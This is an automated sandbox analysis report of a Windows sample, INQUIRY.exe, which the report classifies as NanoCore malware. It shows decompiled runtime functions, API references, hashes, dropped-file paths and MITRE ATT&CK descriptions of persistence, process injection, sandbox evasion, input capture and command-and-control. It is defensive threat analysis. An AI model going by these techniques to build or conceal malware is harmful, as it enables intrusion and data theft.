													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0xc066fb75
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

mscoree.dll, xrefs: 0040364B
CorExitProcess, xrefs: 0040365D

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8 Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0xc066fb75
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405751 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xc066fb76
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Function 00405575 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}

0x0040557b
0x00405586
0x0040558d

APIs

GetCommandLineA.KERNEL32 ref: 00405575
GetCommandLineW.KERNEL32 ref: 00405580

Strings

3_, xrefs: 0040557B

Memory Dump Source

Source File: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: 3_
API String ID: 3253501508-3952000457
Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report INQUIRY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection

E-Banking Fraud

Stealing of Sensitive Information

Remote Access Functionality

Jbx Signature Overview

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\rstmgknbahw.exe.log

C:\Users\user\AppData\Local\Temp\m30xh3rgrf9sf7w0k

C:\Users\user\AppData\Local\Temp\nsc48D5.tmp

C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll

C:\Users\user\AppData\Local\Temp\nsv9D9C.tmp

C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll

C:\Users\user\AppData\Local\Temp\nsz814A.tmp

C:\Users\user\AppData\Local\Temp\nsz814B.tmp\gerys.dll

C:\Users\user\AppData\Local\Temp\taudoswyo

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Windows Analysis Report
INQUIRY.exe

Function 00403225 Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 270
filestringcomCOMMON

Function 004053AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 021A0402 Relevance: 10.7, APIs: 7, Instructions: 196
filememoryCOMMON

Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 004035E3 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Function 00402C5B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 021A12CF Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237
processthreadCOMMON

Function 021A1B9B Relevance: 10.7, APIs: 7, Instructions: 160
fileCOMMON

Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
